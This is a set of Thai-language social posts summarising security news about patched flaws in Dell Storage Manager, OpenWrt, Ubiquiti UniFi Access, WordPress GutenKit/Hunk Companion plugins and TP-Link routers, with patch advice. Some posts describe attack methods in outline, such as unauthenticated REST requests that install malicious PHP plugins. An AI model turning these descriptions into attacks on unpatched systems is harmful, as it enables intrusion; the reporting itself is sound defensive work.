• "ช่องโหว่ร้ายแรงใน Dell Storage Manager – เปิด API โดยไม่ต้องยืนยันตัวตน”

    ลองจินตนาการว่าคุณเป็นผู้ดูแลระบบจัดเก็บข้อมูลขององค์กรที่ใช้ Dell Storage Manager (DSM) อยู่ แล้ววันหนึ่งมีผู้ไม่หวังดีสามารถเข้าถึง API ภายในระบบได้โดยไม่ต้องยืนยันตัวตนเลยแม้แต่น้อย… นี่คือสิ่งที่ช่องโหว่ CVE-2025-43995 กำลังสร้างความปั่นป่วนให้กับผู้ใช้งานทั่วโลก

    ช่องโหว่นี้ได้รับคะแนน CVSS สูงถึง 9.8 ซึ่งจัดอยู่ในระดับ “วิกฤต” โดยเกิดจากการที่ DSM เวอร์ชัน 20.1.21 มีการเปิด API ผ่านไฟล์ ApiProxy.war ใน DataCollectorEar.ear โดยใช้ SessionKey และ UserId พิเศษที่ถูกฝังไว้ในระบบสำหรับการใช้งานภายใน แต่กลับไม่มีการตรวจสอบสิทธิ์อย่างเหมาะสม

    ผลคือ ผู้โจมตีสามารถใช้ข้อมูลเหล่านี้เพื่อเข้าถึงฟังก์ชันการจัดการระบบ เช่น การดูข้อมูลการตั้งค่า การควบคุมการจัดเก็บ หรือแม้แต่การเปลี่ยนแปลงการทำงานของระบบได้จากระยะไกล โดยไม่ต้องมีบัญชีผู้ใช้หรือรหัสผ่านใด ๆ

    Dell ได้ออกเวอร์ชันใหม่ 2020 R1.22 เพื่อแก้ไขช่องโหว่นี้ พร้อมอุดช่องโหว่อื่น ๆ ที่เกี่ยวข้อง เช่น CVE-2025-43994 (การเปิดเผยข้อมูล) และ CVE-2025-46425 (ช่องโหว่ XML External Entity)

    ช่องโหว่ CVE-2025-43995 – Improper Authentication
    เกิดใน DSM เวอร์ชัน 20.1.21
    เปิด API ผ่าน ApiProxy.war โดยใช้ SessionKey และ UserId พิเศษ
    ไม่มีการตรวจสอบสิทธิ์อย่างเหมาะสม

    ความสามารถของผู้โจมตี
    เข้าถึง API ภายในระบบจัดการข้อมูล
    ควบคุมฟังก์ชันการจัดเก็บข้อมูลจากระยะไกล
    ไม่ต้องมีบัญชีผู้ใช้หรือรหัสผ่าน

    ช่องโหว่อื่นที่เกี่ยวข้อง
    CVE-2025-43994 – Missing Authentication for Critical Function
    CVE-2025-46425 – XML External Entity (XXE) ใน DSM เวอร์ชัน 20.1.20

    การแก้ไขโดย Dell
    ออกเวอร์ชัน 2020 R1.22 เพื่ออุดช่องโหว่ทั้งหมด
    แนะนำให้อัปเดต DSM โดยเร็วที่สุด

    https://securityonline.info/critical-dell-storage-manager-flaw-cve-2025-43995-cvss-9-8-allows-unauthenticated-api-bypass/
    📰 "ช่องโหว่ร้ายแรงใน Dell Storage Manager – เปิด API โดยไม่ต้องยืนยันตัวตน” ลองจินตนาการว่าคุณเป็นผู้ดูแลระบบจัดเก็บข้อมูลขององค์กรที่ใช้ Dell Storage Manager (DSM) อยู่ แล้ววันหนึ่งมีผู้ไม่หวังดีสามารถเข้าถึง API ภายในระบบได้โดยไม่ต้องยืนยันตัวตนเลยแม้แต่น้อย… นี่คือสิ่งที่ช่องโหว่ CVE-2025-43995 กำลังสร้างความปั่นป่วนให้กับผู้ใช้งานทั่วโลก ช่องโหว่นี้ได้รับคะแนน CVSS สูงถึง 9.8 ซึ่งจัดอยู่ในระดับ “วิกฤต” โดยเกิดจากการที่ DSM เวอร์ชัน 20.1.21 มีการเปิด API ผ่านไฟล์ ApiProxy.war ใน DataCollectorEar.ear โดยใช้ SessionKey และ UserId พิเศษที่ถูกฝังไว้ในระบบสำหรับการใช้งานภายใน แต่กลับไม่มีการตรวจสอบสิทธิ์อย่างเหมาะสม ผลคือ ผู้โจมตีสามารถใช้ข้อมูลเหล่านี้เพื่อเข้าถึงฟังก์ชันการจัดการระบบ เช่น การดูข้อมูลการตั้งค่า การควบคุมการจัดเก็บ หรือแม้แต่การเปลี่ยนแปลงการทำงานของระบบได้จากระยะไกล โดยไม่ต้องมีบัญชีผู้ใช้หรือรหัสผ่านใด ๆ Dell ได้ออกเวอร์ชันใหม่ 2020 R1.22 เพื่อแก้ไขช่องโหว่นี้ พร้อมอุดช่องโหว่อื่น ๆ ที่เกี่ยวข้อง เช่น CVE-2025-43994 (การเปิดเผยข้อมูล) และ CVE-2025-46425 (ช่องโหว่ XML External Entity) ✅ ช่องโหว่ CVE-2025-43995 – Improper Authentication ➡️ เกิดใน DSM เวอร์ชัน 20.1.21 ➡️ เปิด API ผ่าน ApiProxy.war โดยใช้ SessionKey และ UserId พิเศษ ➡️ ไม่มีการตรวจสอบสิทธิ์อย่างเหมาะสม ✅ ความสามารถของผู้โจมตี ➡️ เข้าถึง API ภายในระบบจัดการข้อมูล ➡️ ควบคุมฟังก์ชันการจัดเก็บข้อมูลจากระยะไกล ➡️ ไม่ต้องมีบัญชีผู้ใช้หรือรหัสผ่าน ✅ ช่องโหว่อื่นที่เกี่ยวข้อง ➡️ CVE-2025-43994 – Missing Authentication for Critical Function ➡️ CVE-2025-46425 – XML External Entity (XXE) ใน DSM เวอร์ชัน 20.1.20 ✅ การแก้ไขโดย Dell ➡️ ออกเวอร์ชัน 2020 R1.22 เพื่ออุดช่องโหว่ทั้งหมด ➡️ แนะนำให้อัปเดต DSM โดยเร็วที่สุด https://securityonline.info/critical-dell-storage-manager-flaw-cve-2025-43995-cvss-9-8-allows-unauthenticated-api-bypass/
    SECURITYONLINE.INFO
    Critical Dell Storage Manager Flaw (CVE-2025-43995, CVSS 9.8) Allows Unauthenticated API Bypass
    Dell patched three flaws in Storage Manager, including a Critical (CVSS 9.8) Auth Bypass (CVE-2025-43995) that allows remote, unauthenticated access to the Data Collector’s APIProxy.war component.
    0 Comments 0 Shares 19 Views 0 Reviews
  • “OpenWrt อุดช่องโหว่ร้ายแรงสองรายการ – เสี่ยง RCE และเจาะหน่วยความจำเคอร์เนลผ่าน DSL Driver”

    ลองจินตนาการว่าเราใช้เราเตอร์ที่รัน OpenWrt ซึ่งเป็นเฟิร์มแวร์ยอดนิยมสำหรับอุปกรณ์ฝังตัว แล้ววันหนึ่งมีคนสามารถส่งคำสั่งจากระยะไกลเพื่อควบคุมระบบ หรือแม้แต่เจาะเข้าไปอ่านและเขียนหน่วยความจำเคอร์เนลได้… นี่คือสิ่งที่ช่องโหว่ล่าสุดใน OpenWrt อาจทำให้เกิดขึ้นได้

    เมื่อวันที่ 27 ตุลาคม 2025 OpenWrt ได้ออกแพตช์เพื่อแก้ไขช่องโหว่ร้ายแรงสองรายการ ได้แก่:

    CVE-2025-62526: ช่องโหว่ Heap Buffer Overflow ใน ubusd ซึ่งเป็น daemon สำหรับการสื่อสารระหว่างโปรเซสใน OpenWrt

    CVE-2025-62525: ช่องโหว่ในไดรเวอร์ ltq-ptm ที่ใช้ในอุปกรณ์ DSL บางรุ่น ทำให้ผู้ใช้สามารถอ่านและเขียนหน่วยความจำเคอร์เนลได้

    ช่องโหว่แรกเปิดให้ผู้โจมตีสามารถส่งข้อความที่ออกแบบมาเฉพาะผ่าน ubus โดยไม่ต้องผ่านการตรวจสอบสิทธิ์ใด ๆ เพราะโค้ดที่เปราะบางทำงานก่อนการตรวจสอบ ACL ทำให้สามารถรันโค้ดในบริบทของ daemon ได้ทันที

    ช่องโหว่ที่สองเปิดให้ผู้ใช้ในระบบสามารถใช้ ioctl เพื่อเข้าถึงหน่วยความจำเคอร์เนล ซึ่งอาจนำไปสู่การหลบหนีจาก sandbox เช่น ujail ได้

    OpenWrt ได้แก้ไขช่องโหว่เหล่านี้ในเวอร์ชัน 24.10.4 และ snapshot builds หลังวันที่ 15–18 ตุลาคม 2025 โดยเวอร์ชันเก่าเช่น 22.03 และ 23.05 จะไม่ได้รับการสนับสนุนอีกต่อไป

    ช่องโหว่ CVE-2025-62526 – ubusd Heap Buffer Overflow
    เกิดในโค้ดการ parse event registration
    ทำงานก่อนการตรวจสอบ ACL
    เปิดช่องให้รันโค้ดในบริบทของ daemon
    ส่งผลให้ bypass ACL ได้ด้วย

    ช่องโหว่ CVE-2025-62525 – Kernel Memory Leak ผ่าน ltq-ptm
    ใช้ ioctl เพื่ออ่าน/เขียนหน่วยความจำเคอร์เนล
    กระทบอุปกรณ์ที่ใช้ SoC เช่น xrx200, danube, amazon
    ใช้ในโหมด PTM (VDSL) ไม่กระทบ ATM หรือ VRX518

    การแก้ไขโดย OpenWrt
    แก้ไขในเวอร์ชัน 24.10.4 และ snapshot builds หลัง 15–18 ต.ค. 2025
    เวอร์ชัน 22.03 และ 23.05 ไม่ได้รับการสนับสนุนแล้ว

    ความเสี่ยงที่อาจเกิดขึ้น
    การควบคุมระบบจากระยะไกล (RCE)
    การหลบหนีจาก sandbox เช่น ujail
    การเข้าถึงข้อมูลลับในหน่วยความจำเคอร์เนล

    https://securityonline.info/openwrt-patches-ubusd-rce-flaw-cve-2025-62526-and-kernel-memory-leak-cve-2025-62525-in-dsl-driver/
    📰 “OpenWrt อุดช่องโหว่ร้ายแรงสองรายการ – เสี่ยง RCE และเจาะหน่วยความจำเคอร์เนลผ่าน DSL Driver” ลองจินตนาการว่าเราใช้เราเตอร์ที่รัน OpenWrt ซึ่งเป็นเฟิร์มแวร์ยอดนิยมสำหรับอุปกรณ์ฝังตัว แล้ววันหนึ่งมีคนสามารถส่งคำสั่งจากระยะไกลเพื่อควบคุมระบบ หรือแม้แต่เจาะเข้าไปอ่านและเขียนหน่วยความจำเคอร์เนลได้… นี่คือสิ่งที่ช่องโหว่ล่าสุดใน OpenWrt อาจทำให้เกิดขึ้นได้ เมื่อวันที่ 27 ตุลาคม 2025 OpenWrt ได้ออกแพตช์เพื่อแก้ไขช่องโหว่ร้ายแรงสองรายการ ได้แก่: 🪲 CVE-2025-62526: ช่องโหว่ Heap Buffer Overflow ใน ubusd ซึ่งเป็น daemon สำหรับการสื่อสารระหว่างโปรเซสใน OpenWrt 🪲 CVE-2025-62525: ช่องโหว่ในไดรเวอร์ ltq-ptm ที่ใช้ในอุปกรณ์ DSL บางรุ่น ทำให้ผู้ใช้สามารถอ่านและเขียนหน่วยความจำเคอร์เนลได้ ช่องโหว่แรกเปิดให้ผู้โจมตีสามารถส่งข้อความที่ออกแบบมาเฉพาะผ่าน ubus โดยไม่ต้องผ่านการตรวจสอบสิทธิ์ใด ๆ เพราะโค้ดที่เปราะบางทำงานก่อนการตรวจสอบ ACL ทำให้สามารถรันโค้ดในบริบทของ daemon ได้ทันที ช่องโหว่ที่สองเปิดให้ผู้ใช้ในระบบสามารถใช้ ioctl เพื่อเข้าถึงหน่วยความจำเคอร์เนล ซึ่งอาจนำไปสู่การหลบหนีจาก sandbox เช่น ujail ได้ OpenWrt ได้แก้ไขช่องโหว่เหล่านี้ในเวอร์ชัน 24.10.4 และ snapshot builds หลังวันที่ 15–18 ตุลาคม 2025 โดยเวอร์ชันเก่าเช่น 22.03 และ 23.05 จะไม่ได้รับการสนับสนุนอีกต่อไป ✅ ช่องโหว่ CVE-2025-62526 – ubusd Heap Buffer Overflow ➡️ เกิดในโค้ดการ parse event registration ➡️ ทำงานก่อนการตรวจสอบ ACL ➡️ เปิดช่องให้รันโค้ดในบริบทของ daemon ➡️ ส่งผลให้ bypass ACL ได้ด้วย ✅ ช่องโหว่ CVE-2025-62525 – Kernel Memory Leak ผ่าน ltq-ptm ➡️ ใช้ ioctl เพื่ออ่าน/เขียนหน่วยความจำเคอร์เนล ➡️ กระทบอุปกรณ์ที่ใช้ SoC เช่น xrx200, danube, amazon ➡️ ใช้ในโหมด PTM (VDSL) ไม่กระทบ ATM หรือ VRX518 ✅ การแก้ไขโดย OpenWrt ➡️ แก้ไขในเวอร์ชัน 24.10.4 และ snapshot builds หลัง 15–18 ต.ค. 2025 ➡️ เวอร์ชัน 22.03 และ 23.05 ไม่ได้รับการสนับสนุนแล้ว ✅ ความเสี่ยงที่อาจเกิดขึ้น ➡️ การควบคุมระบบจากระยะไกล (RCE) ➡️ การหลบหนีจาก sandbox เช่น ujail ➡️ การเข้าถึงข้อมูลลับในหน่วยความจำเคอร์เนล https://securityonline.info/openwrt-patches-ubusd-rce-flaw-cve-2025-62526-and-kernel-memory-leak-cve-2025-62525-in-dsl-driver/
    SECURITYONLINE.INFO
    OpenWrt Patches ubusd RCE Flaw (CVE-2025-62526) and Kernel Memory Leak (CVE-2025-62525) in DSL Driver
    OpenWrt released v24.10.4 to fix two high-severity flaws: CVE-2025-62526 allows RCE via a heap buffer overflow in ubusd, and CVE-2025-62525 leaks kernel memory via a DSL driver.
    0 Comments 0 Shares 21 Views 0 Reviews
  • “Ubiquiti อุดช่องโหว่ร้ายแรงใน UniFi Access – API เปิดโดยไม่ต้องยืนยันตัวตน”

    หากคุณใช้ระบบควบคุมประตูอัจฉริยะ UniFi Access ของ Ubiquiti อาจถึงเวลาตรวจสอบระบบอย่างจริงจัง เพราะมีการค้นพบช่องโหว่ระดับ “วิกฤต” ที่เปิดให้ผู้โจมตีเข้าถึง API การจัดการระบบได้โดยไม่ต้องยืนยันตัวตนเลยแม้แต่น้อย

    ช่องโหว่นี้ได้รับคะแนน CVSS เต็ม 10.0 ซึ่งหมายถึงระดับความรุนแรงสูงสุดในมาตรฐานความปลอดภัยไซเบอร์ โดยผู้โจมตีสามารถส่งคำสั่งผ่าน API เพื่อควบคุมระบบประตู เช่น เปิด-ปิดประตู เปลี่ยนการตั้งค่า หรือแม้แต่เพิ่มผู้ใช้งานใหม่ได้ทันที โดยไม่ต้องมีสิทธิ์แอดมิน

    Ubiquiti ได้ออกแพตช์เพื่อแก้ไขช่องโหว่นี้แล้ว และแนะนำให้ผู้ใช้งานอัปเดตเฟิร์มแวร์ของ UniFi Access โดยเร็วที่สุด เพื่อป้องกันการถูกโจมตีจากระยะไกล

    ช่องโหว่นี้ถูกค้นพบโดยนักวิจัยด้านความปลอดภัย และมีการแจ้งเตือนผ่านช่องทางสาธารณะ ทำให้ผู้โจมตีสามารถใช้ข้อมูลดังกล่าวในการโจมตีระบบที่ยังไม่ได้อัปเดตได้ทันที

    ช่องโหว่ใน UniFi Access ของ Ubiquiti
    เปิด API การจัดการโดยไม่ต้องยืนยันตัวตน
    ได้รับคะแนน CVSS 10.0 ซึ่งเป็นระดับสูงสุด

    ความสามารถของผู้โจมตี
    ควบคุมระบบประตูจากระยะไกล
    เปลี่ยนการตั้งค่า เพิ่มผู้ใช้ หรือเปิดประตูได้ทันที
    ไม่ต้องมีสิทธิ์แอดมินหรือบัญชีผู้ใช้ใด ๆ

    การตอบสนองของ Ubiquiti
    ออกแพตช์เพื่อแก้ไขช่องโหว่แล้ว
    แนะนำให้อัปเดตเฟิร์มแวร์ของ UniFi Access โดยเร็ว

    ความสำคัญของการอัปเดต
    ช่องโหว่ถูกเปิดเผยต่อสาธารณะแล้ว
    ระบบที่ยังไม่ได้อัปเดตมีความเสี่ยงสูงต่อการถูกโจมตี

    https://securityonline.info/ubiquiti-patches-critical-cvss-10-flaw-in-unifi-access-that-exposed-management-api-without-authentication/
    📰 “Ubiquiti อุดช่องโหว่ร้ายแรงใน UniFi Access – API เปิดโดยไม่ต้องยืนยันตัวตน” หากคุณใช้ระบบควบคุมประตูอัจฉริยะ UniFi Access ของ Ubiquiti อาจถึงเวลาตรวจสอบระบบอย่างจริงจัง เพราะมีการค้นพบช่องโหว่ระดับ “วิกฤต” ที่เปิดให้ผู้โจมตีเข้าถึง API การจัดการระบบได้โดยไม่ต้องยืนยันตัวตนเลยแม้แต่น้อย ช่องโหว่นี้ได้รับคะแนน CVSS เต็ม 10.0 ซึ่งหมายถึงระดับความรุนแรงสูงสุดในมาตรฐานความปลอดภัยไซเบอร์ โดยผู้โจมตีสามารถส่งคำสั่งผ่าน API เพื่อควบคุมระบบประตู เช่น เปิด-ปิดประตู เปลี่ยนการตั้งค่า หรือแม้แต่เพิ่มผู้ใช้งานใหม่ได้ทันที โดยไม่ต้องมีสิทธิ์แอดมิน Ubiquiti ได้ออกแพตช์เพื่อแก้ไขช่องโหว่นี้แล้ว และแนะนำให้ผู้ใช้งานอัปเดตเฟิร์มแวร์ของ UniFi Access โดยเร็วที่สุด เพื่อป้องกันการถูกโจมตีจากระยะไกล ช่องโหว่นี้ถูกค้นพบโดยนักวิจัยด้านความปลอดภัย และมีการแจ้งเตือนผ่านช่องทางสาธารณะ ทำให้ผู้โจมตีสามารถใช้ข้อมูลดังกล่าวในการโจมตีระบบที่ยังไม่ได้อัปเดตได้ทันที ✅ ช่องโหว่ใน UniFi Access ของ Ubiquiti ➡️ เปิด API การจัดการโดยไม่ต้องยืนยันตัวตน ➡️ ได้รับคะแนน CVSS 10.0 ซึ่งเป็นระดับสูงสุด ✅ ความสามารถของผู้โจมตี ➡️ ควบคุมระบบประตูจากระยะไกล ➡️ เปลี่ยนการตั้งค่า เพิ่มผู้ใช้ หรือเปิดประตูได้ทันที ➡️ ไม่ต้องมีสิทธิ์แอดมินหรือบัญชีผู้ใช้ใด ๆ ✅ การตอบสนองของ Ubiquiti ➡️ ออกแพตช์เพื่อแก้ไขช่องโหว่แล้ว ➡️ แนะนำให้อัปเดตเฟิร์มแวร์ของ UniFi Access โดยเร็ว ✅ ความสำคัญของการอัปเดต ➡️ ช่องโหว่ถูกเปิดเผยต่อสาธารณะแล้ว ➡️ ระบบที่ยังไม่ได้อัปเดตมีความเสี่ยงสูงต่อการถูกโจมตี https://securityonline.info/ubiquiti-patches-critical-cvss-10-flaw-in-unifi-access-that-exposed-management-api-without-authentication/
    SECURITYONLINE.INFO
    Ubiquiti Patches Critical CVSS 10 Flaw in UniFi Access That Exposed Management API Without Authentication
    Ubiquiti issued an urgent patch for a Critical Auth Bypass flaw in UniFi Access. Attackers with network access can fully take over door management systems.
    0 Comments 0 Shares 13 Views 0 Reviews
  • หัวข้อข่าว: “ภัยร้ายจากปลั๊กอิน WordPress กลับมาอีกครั้ง – กว่า 8.7 ล้านครั้งโจมตีผ่าน GutenKit และ Hunk

    ลองจินตนาการว่าคุณเป็นผู้ดูแลเว็บไซต์ WordPress ที่ใช้งานปลั๊กอินยอดนิยมอย่าง GutenKit หรือ Hunk Companion อยู่ดี ๆ วันหนึ่งเว็บไซต์ของคุณถูกแฮกโดยไม่รู้ตัว เพราะมีช่องโหว่ที่เปิดให้ผู้ไม่หวังดีสามารถติดตั้งปลั๊กอินอันตรายจากภายนอกได้โดยไม่ต้องยืนยันตัวตนเลยแม้แต่น้อย...

    นี่คือสิ่งที่เกิดขึ้นจริงในเดือนตุลาคม 2025 เมื่อ Wordfence ทีมผู้เชี่ยวชาญด้านความปลอดภัยออกมาเตือนถึงการกลับมาของการโจมตีครั้งใหญ่ที่เคยเกิดขึ้นเมื่อปีก่อน โดยมีการโจมตีมากกว่า 8.7 ล้านครั้งผ่านช่องโหว่ในปลั๊กอิน GutenKit และ Hunk Companion ซึ่งมีผู้ใช้งานรวมกันกว่า 48,000 เว็บไซต์ทั่วโลก

    ช่องโหว่เหล่านี้เปิดให้ผู้โจมตีสามารถส่งคำสั่งผ่าน REST API ที่ไม่มีการตรวจสอบสิทธิ์ ทำให้สามารถติดตั้งปลั๊กอินจากภายนอกที่แฝงมัลแวร์ได้ทันที โดยปลั๊กอินปลอมเหล่านี้มักมีชื่อดูไม่น่าสงสัย เช่น “background-image-cropper” หรือ “ultra-seo-processor-wp” แต่ภายในกลับเต็มไปด้วยโค้ดอันตรายที่สามารถเปิดช่องให้แฮกเกอร์ควบคุมเว็บไซต์จากระยะไกลได้

    ที่น่ากลัวกว่านั้นคือ ผู้โจมตีใช้บอตเน็ตจากเซิร์ฟเวอร์ที่ถูกแฮกแล้วในการโจมตีแบบอัตโนมัติทั่วโลก และยังมีการใช้ปลั๊กอินอื่นที่มีช่องโหว่เพื่อเชื่อมโยงการโจมตีให้ลึกขึ้น เช่น wp-query-console ที่ยังไม่มีการอุดช่องโหว่

    นอกจากการอัปเดตปลั๊กอินให้เป็นเวอร์ชันล่าสุดแล้ว ผู้ดูแลเว็บไซต์ควรตรวจสอบไฟล์ที่ไม่รู้จักในโฟลเดอร์ปลั๊กอิน และบล็อก IP ที่มีพฤติกรรมต้องสงสัยทันที เพื่อป้องกันการโจมตีซ้ำ

    ช่องโหว่ปลั๊กอิน WordPress GutenKit และ Hunk Companion
    ช่องโหว่ CVE-2024-9234, CVE-2024-9707, CVE-2024-11972 มีคะแนน CVSS 9.8
    เปิดให้ติดตั้งปลั๊กอินจากภายนอกโดยไม่ต้องยืนยันตัวตน
    GutenKit มีผู้ใช้งานกว่า 40,000 เว็บไซต์, Hunk Companion กว่า 8,000 เว็บไซต์

    การโจมตีที่เกิดขึ้น
    เริ่มกลับมาอีกครั้งในเดือนตุลาคม 2025
    Wordfence บล็อกการโจมตีไปแล้วกว่า 8.7 ล้านครั้ง
    ใช้บอตเน็ตจากเซิร์ฟเวอร์ที่ถูกแฮกในการโจมตีแบบอัตโนมัติ

    ตัวอย่างปลั๊กอินปลอมที่พบ
    background-image-cropper
    ultra-seo-processor-wp
    oke, up

    วิธีการโจมตี
    ส่ง POST request ไปยัง REST API ที่ไม่มีการตรวจสอบสิทธิ์
    ใช้ ZIP file ที่แฝงโค้ด PHP อันตราย เช่น vv.php
    โค้ดมีความสามารถในการเปิด terminal, ดักข้อมูล, เปลี่ยนสิทธิ์ไฟล์

    แนวทางป้องกัน
    อัปเดต GutenKit เป็นเวอร์ชัน ≥ 2.1.1 และ Hunk Companion ≥ 1.9.0
    ตรวจสอบโฟลเดอร์ /wp-content/plugins/ และ /wp-content/upgrade/
    ตรวจสอบ access logs สำหรับ endpoint ที่น่าสงสัย
    บล็อก IP ที่มีพฤติกรรมโจมตี

    https://securityonline.info/critical-wordpress-rce-flaws-resurface-over-8-7-million-attacks-exploit-gutenkit-hunk-companion/
    📰 หัวข้อข่าว: “ภัยร้ายจากปลั๊กอิน WordPress กลับมาอีกครั้ง – กว่า 8.7 ล้านครั้งโจมตีผ่าน GutenKit และ Hunk ลองจินตนาการว่าคุณเป็นผู้ดูแลเว็บไซต์ WordPress ที่ใช้งานปลั๊กอินยอดนิยมอย่าง GutenKit หรือ Hunk Companion อยู่ดี ๆ วันหนึ่งเว็บไซต์ของคุณถูกแฮกโดยไม่รู้ตัว เพราะมีช่องโหว่ที่เปิดให้ผู้ไม่หวังดีสามารถติดตั้งปลั๊กอินอันตรายจากภายนอกได้โดยไม่ต้องยืนยันตัวตนเลยแม้แต่น้อย... นี่คือสิ่งที่เกิดขึ้นจริงในเดือนตุลาคม 2025 เมื่อ Wordfence ทีมผู้เชี่ยวชาญด้านความปลอดภัยออกมาเตือนถึงการกลับมาของการโจมตีครั้งใหญ่ที่เคยเกิดขึ้นเมื่อปีก่อน โดยมีการโจมตีมากกว่า 8.7 ล้านครั้งผ่านช่องโหว่ในปลั๊กอิน GutenKit และ Hunk Companion ซึ่งมีผู้ใช้งานรวมกันกว่า 48,000 เว็บไซต์ทั่วโลก ช่องโหว่เหล่านี้เปิดให้ผู้โจมตีสามารถส่งคำสั่งผ่าน REST API ที่ไม่มีการตรวจสอบสิทธิ์ ทำให้สามารถติดตั้งปลั๊กอินจากภายนอกที่แฝงมัลแวร์ได้ทันที โดยปลั๊กอินปลอมเหล่านี้มักมีชื่อดูไม่น่าสงสัย เช่น “background-image-cropper” หรือ “ultra-seo-processor-wp” แต่ภายในกลับเต็มไปด้วยโค้ดอันตรายที่สามารถเปิดช่องให้แฮกเกอร์ควบคุมเว็บไซต์จากระยะไกลได้ ที่น่ากลัวกว่านั้นคือ ผู้โจมตีใช้บอตเน็ตจากเซิร์ฟเวอร์ที่ถูกแฮกแล้วในการโจมตีแบบอัตโนมัติทั่วโลก และยังมีการใช้ปลั๊กอินอื่นที่มีช่องโหว่เพื่อเชื่อมโยงการโจมตีให้ลึกขึ้น เช่น wp-query-console ที่ยังไม่มีการอุดช่องโหว่ นอกจากการอัปเดตปลั๊กอินให้เป็นเวอร์ชันล่าสุดแล้ว ผู้ดูแลเว็บไซต์ควรตรวจสอบไฟล์ที่ไม่รู้จักในโฟลเดอร์ปลั๊กอิน และบล็อก IP ที่มีพฤติกรรมต้องสงสัยทันที เพื่อป้องกันการโจมตีซ้ำ ✅ ช่องโหว่ปลั๊กอิน WordPress GutenKit และ Hunk Companion ➡️ ช่องโหว่ CVE-2024-9234, CVE-2024-9707, CVE-2024-11972 มีคะแนน CVSS 9.8 ➡️ เปิดให้ติดตั้งปลั๊กอินจากภายนอกโดยไม่ต้องยืนยันตัวตน ➡️ GutenKit มีผู้ใช้งานกว่า 40,000 เว็บไซต์, Hunk Companion กว่า 8,000 เว็บไซต์ ✅ การโจมตีที่เกิดขึ้น ➡️ เริ่มกลับมาอีกครั้งในเดือนตุลาคม 2025 ➡️ Wordfence บล็อกการโจมตีไปแล้วกว่า 8.7 ล้านครั้ง ➡️ ใช้บอตเน็ตจากเซิร์ฟเวอร์ที่ถูกแฮกในการโจมตีแบบอัตโนมัติ ✅ ตัวอย่างปลั๊กอินปลอมที่พบ ➡️ background-image-cropper ➡️ ultra-seo-processor-wp ➡️ oke, up ✅ วิธีการโจมตี ➡️ ส่ง POST request ไปยัง REST API ที่ไม่มีการตรวจสอบสิทธิ์ ➡️ ใช้ ZIP file ที่แฝงโค้ด PHP อันตราย เช่น vv.php ➡️ โค้ดมีความสามารถในการเปิด terminal, ดักข้อมูล, เปลี่ยนสิทธิ์ไฟล์ ✅ แนวทางป้องกัน ➡️ อัปเดต GutenKit เป็นเวอร์ชัน ≥ 2.1.1 และ Hunk Companion ≥ 1.9.0 ➡️ ตรวจสอบโฟลเดอร์ /wp-content/plugins/ และ /wp-content/upgrade/ ➡️ ตรวจสอบ access logs สำหรับ endpoint ที่น่าสงสัย ➡️ บล็อก IP ที่มีพฤติกรรมโจมตี https://securityonline.info/critical-wordpress-rce-flaws-resurface-over-8-7-million-attacks-exploit-gutenkit-hunk-companion/
    SECURITYONLINE.INFO
    Critical WordPress RCE Flaws Resurface: Over 8.7 Million Attacks Exploit GutenKit & Hunk Companion
    Wordfence warned of a massive RCE campaign (8.7M+ attacks) exploiting flaws in GutenKit/Hunk Companion plugins. Unauthenticated attackers can install malicious plugins via vulnerable REST API endpoints.
    0 Comments 0 Shares 16 Views 0 Reviews
  • TP-Link เจอช่องโหว่ร้ายแรง – โค้ดดีบั๊กเก่ากลับมาอีกครั้ง เปิดช่องให้แฮกเกอร์เข้าถึง root ได้

    TP-Link กำลังเผชิญกับปัญหาด้านความปลอดภัยครั้งใหญ่ เมื่อมีการค้นพบช่องโหว่ใหม่ 2 รายการในเราเตอร์รุ่น Omada และ Festa ซึ่งเปิดช่องให้แฮกเกอร์สามารถเข้าถึงระบบในระดับ root ได้ ช่องโหว่เหล่านี้ถูกติดตามในชื่อ CVE-2025-7850 และ CVE-2025-7851 โดยทีมวิจัยจาก Forescout’s Vedere Labs

    CVE-2025-7851 เกิดจากโค้ดดีบั๊กเก่าที่เคยถูกใช้ในช่องโหว่ CVE-2024-21827 แม้ TP-Link จะเคยออกแพตช์แก้ไขไปแล้ว แต่กลับมีโค้ดบางส่วนหลงเหลืออยู่ และสามารถถูกเรียกใช้งานได้อีกครั้งหากมีไฟล์ชื่อ image_type_debug อยู่ในระบบ ทำให้แฮกเกอร์สามารถเข้าสู่ระบบด้วยสิทธิ์ root ได้

    ช่องโหว่อีกตัวคือ CVE-2025-7850 เกิดจากการจัดการข้อมูลในฟิลด์ private key ของ WireGuard VPN ไม่ดีพอ ทำให้ผู้ใช้ที่ผ่านการยืนยันตัวตนสามารถ inject คำสั่งเข้าสู่ระบบได้ และเมื่อใช้ร่วมกับช่องโหว่แรก จะสามารถควบคุมอุปกรณ์ได้อย่างสมบูรณ์

    การค้นพบนี้ยังนำไปสู่การตรวจสอบเพิ่มเติม ซึ่งพบช่องโหว่อีก 15 รายการในอุปกรณ์ TP-Link รุ่นอื่นๆ ที่กำลังอยู่ในกระบวนการเปิดเผยและแก้ไขภายในต้นปี 2026

    ช่องโหว่ใหม่ในเราเตอร์ TP-Link
    CVE-2025-7851: โค้ดดีบั๊กเก่ากลับมาใช้งานได้อีกครั้ง
    CVE-2025-7850: ช่องโหว่ใน WireGuard VPN ที่เปิดให้ inject คำสั่ง
    ใช้ร่วมกันแล้วสามารถควบคุมอุปกรณ์ได้แบบ root access
    พบในรุ่น Omada และ Festa

    การตรวจสอบเพิ่มเติม
    พบช่องโหว่อีก 15 รายการในอุปกรณ์ TP-Link รุ่นอื่น
    อยู่ในกระบวนการเปิดเผยและแก้ไขภายในต้นปี 2026
    แสดงถึงปัญหาการจัดการโค้ดและการแพตช์ที่ไม่สมบูรณ์

    คำแนะนำจากผู้เชี่ยวชาญ
    ควรอัปเดตเฟิร์มแวร์ทันทีเมื่อมีแพตช์ออก
    ปิดการเข้าถึงจากระยะไกลหากไม่จำเป็น
    ตรวจสอบ log เครือข่ายเพื่อหาสัญญาณการโจมตี

    ข้อควรระวังและความเสี่ยง
    ช่องโหว่ CVE-2025-7850 อาจถูกโจมตีจากระยะไกลโดยไม่ต้องยืนยันตัวตน
    การแพตช์ที่ไม่สมบูรณ์อาจเปิดช่องให้โค้ดเก่ากลับมาใช้งานได้อีก
    อุปกรณ์ที่ดูเหมือนปลอดภัยอาจยังมีช่องโหว่ซ่อนอยู่
    การใช้ VPN โดยไม่ตรวจสอบความปลอดภัยอาจกลายเป็นช่องทางโจมตี

    https://www.techradar.com/pro/security/hidden-debug-code-returns-from-the-dead-as-tp-link-routers-face-a-wave-of-new-critical-root-access-flaws
